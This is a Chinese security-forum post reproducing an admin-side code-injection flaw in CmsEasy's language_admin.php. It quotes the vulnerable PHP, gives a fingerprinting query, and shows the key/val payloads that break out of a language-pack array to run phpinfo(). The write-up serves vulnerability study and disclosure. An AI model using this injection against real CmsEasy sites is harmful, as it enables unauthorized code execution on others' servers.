问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
CmsEasy language_admin.php 后台命令执行漏洞
# CmsEasy language_admin.php 后台命令执行漏洞 ## 漏洞描述 CmsEasy 后台存在命令执行漏洞,通过文件 language_admin.php 对部分文件进行写入操作,导致任意文件写入 ## 影响版本...
CmsEasy language\_admin.php 后台命令执行漏洞 ==================================== 漏洞描述 ---- CmsEasy 后台存在命令执行漏洞,通过文件 language\_admin.php 对部分文件进行写入操作,导致任意文件写入 影响版本 ---- CmsEasy V7.7.5\_20210919 网络测绘 ---- body="cmseasyedit" 环境搭建 ---- <https://www.cmseasy.cn/chm/faq/show-645.html> data:image/s3,"s3://crabby-images/86977/86977cd229078b0dfa38016c8ec4179484249fd0" alt="img" 漏洞复现 ---- 主页面 data:image/s3,"s3://crabby-images/2c94a/2c94a2b77e453eea66f2f4836913cf10b135d414" alt="img" 存在漏洞的文件为 `lib/admin/language_admin.php` data:image/s3,"s3://crabby-images/2a24e/2a24ecb044c96dee1b66217c652955efa597b863" alt="img" ```php function add_action() { $lang_choice='system.php'; if (isset($_GET['lang_choice'])){ $lang_choice=$_GET['lang_choice']; } if (front::post('submit')) { $langid=front::get('id'); $lang=new lang(); $langdata = $lang->getrows('id='.$langid, 1); if (is_array($langdata)){ $langurlname=$langdata[0]['langurlname']; }else{ front::alert(lang_admin('language_pack').lang_admin('nonentity')); } $path=ROOT.'/lang/'.$langurlname.'/'.$lang_choice; $tipspath=ROOT.'/lang/'.$langurlname.'/'.$lang_choice; $content=file_get_contents($path); $tipscontent=file_get_contents($tipspath); $replace="'".front::$post['key']."'=>'".front::$post['val']."',"; $tipsreplace="'".front::$post['key']."'=>'".front::$post['cnnote']."',"; $content=str_replace(');',"\n".$replace.');',$content); file_put_contents($path,$content); $pos=strpos($tipscontent,$tipsreplace); if ($langurlname != 'cn'&&$pos === false) { $tipscontent=str_replace(');',"\n".$tipsreplace.');',$tipscontent); file_put_contents($tipspath,$tipscontent); } if ($_GET['site'] != 'default') { $ftp=new nobftp(); $ftpconfig=config::get('website'); $ftp->connect($ftpconfig['ftpip'],$ftpconfig['ftpuser'],$ftpconfig['ftppwd'],$ftpconfig['ftpport']); $ftperror=$ftp->returnerror(); if ($ftperror) { exit($ftperror); } else { $ftp->nobchdir($ftpconfig['ftppath']); $ftp->nobput($ftpconfig['ftppath'].'/lang/'.$langurlname.'/'.$lang_choice,$path); } } event::log(lang_admin('add_to').lang_admin('language_pack'),lang_admin('success')); // $shepi='<script type="text/javascript">alert("'.lang_admin('dosomething').lang_admin('complete').'");gotoinurl("'.url('language/edit/id/'.$langdata[0]['id'],true); $shepi=$shepi.'&lang_choice='.$lang_choice; $shepi=$shepi.'");</script>'; echo $shepi; //exit; //front::refresh(url('language/edit',true)); } $this->view->lang_choice=$lang_choice; } ``` 访问这个页面 data:image/s3,"s3://crabby-images/6e16e/6e16e121b43af785430eccc3cf9a3b61fad9567d" alt="img" 其中参数有三个,分别为 `key , cnnote, val` data:image/s3,"s3://crabby-images/8fbd6/8fbd6bed852dcec8318a7ee2c6bade307b67819a" alt="img" 传入参数后,查看 `lang/cn/system_custom.php` 文件中 ```php <?php /* *中文语言包 */ return array( '2'=>'3',); ?> ``` 由于没有对传入的参数进行过滤,通过写入特殊的参数就可以逃逸出数组造成命令执行 分别传入两次参数 ```php test1 test2 test3); ``` 写入后文件内容 ```php <?php /* *中文语言包 */ return array( 'test2'=>'test3);',); ?> ``` 再传入一次参数 ```php test4 ,test5, ,phpinfo());/* ``` data:image/s3,"s3://crabby-images/4d317/4d31734a20c3f24981f17b690ecb50c4b3111223" alt="img" 写入后文件内容 data:image/s3,"s3://crabby-images/698f2/698f2141d66ea647b1e2eef6a77d54e97a9a7f97" alt="img" 访问文件 `/lang/cn/system_custom.php` data:image/s3,"s3://crabby-images/b654f/b654fa26017123edb3b4c6f042ca697362d03853" alt="img" 若有收获,就点个赞吧
发表于 2024-07-12 18:43:30
阅读 ( 1704 )
分类:
CMS
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!